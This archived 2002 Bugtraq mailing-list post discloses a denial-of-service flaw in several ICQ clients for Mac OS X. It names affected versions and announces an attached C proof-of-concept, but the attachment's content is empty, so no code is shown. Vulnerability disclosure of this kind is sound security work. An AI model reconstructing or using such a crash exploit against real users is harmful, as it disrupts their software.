[24117] in bugtraq


OSX ICQ DoS

daemon@ATHENA.MIT.EDU (Stephen)
Tue Feb 5 13:05:59 2002

Date: Tue, 5 Feb 2002 11:00:45 -0500 (EST)
From: Stephen <sa7ori@tasam.com>
To: bugtraq@securityfocus.com
Message-ID: <20020205104938.U73726-200000@tasam.com>
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="0-1297166189-1012924845=:77895"

--0-1297166189-1012924845=:77895
Content-Type: TEXT/PLAIN; charset=US-ASCII

Hello,
	I looked a bit for this problem on the web, and can't find it so
I am posting it here. Yeah, so it's a lame DoS for several versions of
OSX's ICQ clients. Version information is in the comment space of the
proof of concept exploit code I have included below. This was a quick
hack based on some code I authored that exploited a similar problem with
some earlier versions of Licq. I was learning basic socket coding at the
time I wrote the Licq thingy, but nonetheless here is the code that works
on ICQ MacOSX Ver 2.6x Beta Build 7 and others.



--0-1297166189-1012924845=:77895
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="osxicq.c"
Content-Transfer-Encoding: BASE64
Content-ID: <20020205110045.P77895@tasam.com>
Content-Description: osxicq dos proof
Content-Disposition: attachment; filename="osxicq.c"
--0-1297166189-1012924845=:77895--
